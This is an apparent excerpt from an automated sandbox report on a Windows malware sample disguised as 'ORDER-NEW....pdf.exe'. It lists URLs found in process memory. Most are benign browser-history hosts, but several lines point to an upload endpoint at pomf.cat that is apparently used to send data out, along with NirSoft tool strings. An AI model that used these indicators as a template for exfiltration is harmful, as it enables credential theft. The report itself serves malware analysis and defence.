              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ywNG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMVUFn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0E
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0R
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gsr202
              Source: bhvF129.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0-
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
              Source: bhvF129.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, AppLaunch.exe, 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=333&w=311
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eTok.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=333&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ywNG.img?h=75&w=100
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
              Source: bhvF129.tmp.8.drString found in binary or memory: http://support.google.com/accounts/answer/151657
              Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.google.com/
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712829130.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712034300.00000000022B6000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712693489.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/?ocid=iehp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
              Source: bhvF129.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
              Source: vbc.exe, 00000008.00000002.715560522.000000000019C000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: vbc.exe, 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: vbc.exe, 00000008.00000003.712859827.00000000022AF000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://172.217.23.78/
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
              Source: bhvF129.tmp.8.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNRfxSclVePPTskt_ULwutuxovZBENP6CQBK41sqxH
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNSN_Te_GQT33AAAR6UNrVcn3a-PGny50bSNsHlzoT
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNRxRJyZzZp4KXfYTC7Z4q4fsi2jmRa8YGEqdB288n
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/adsid/google/ui
              Source: bhvF129.tmp.8.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframes
              Source: bhvF129.tmp.8.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
              Source: bhvF129.tmp.8.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: vbc.exe, 00000008.00000003.712390571.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712341279.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712199419.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712142150.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712293496.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711936953.00000000022B7000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.711967368.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712232690.00000000022A2000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712081309.00000000022A2000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
              Source: bhvF129.tmp.8.drString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
              Source: bhvF129.tmp.8.drString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhvF129.tmp.8.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhvF129.tmp.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvF129.tmp.8.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQE7dARJDf70CVtvXguPcFi4kAoAFTTEX3FZ_Kd&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQEZeIjizh9n8teY_8BOjsYtpLHwSdIq3PT-WQtot4&s=10
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQFso5PEv3c0kRR2gODJUq62DZF6fnxNsqKUTBX-00QeuCR
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJBttAzO3yKFNSKzEm8qyQoBw2vbSHn0xMB0yhbgc&s=10
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSkA3BhTLNTXreS8GxkTmsFGydHUKxWR3gtSn5&s=0
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQYaLHOGeTAvxcl2Kvu_RGdrblf1tOpndi7m5_OMgFvfzlI
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQc9-XcC69nXJpriIbLos4bSDdjrz_nByi2zL9xxJ4&s=10
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcijPNIB_ZGSU0DrjPI_tJ1YOI-6PHUbyHUjTLi3M5nnkK
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQehqYcvOrRcw1YORGnrCzHbNyjMegefhpqYrPQO8G2_KPc
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQyeaAiOCtrhzoyiUuHOZcp67UWv4aYiYIKZ629tWqIyQ_l
              Source: bhvF129.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6qDJUCBqqO8k81oIRUuLKwKNP-ux5oIGn1btf&s=0
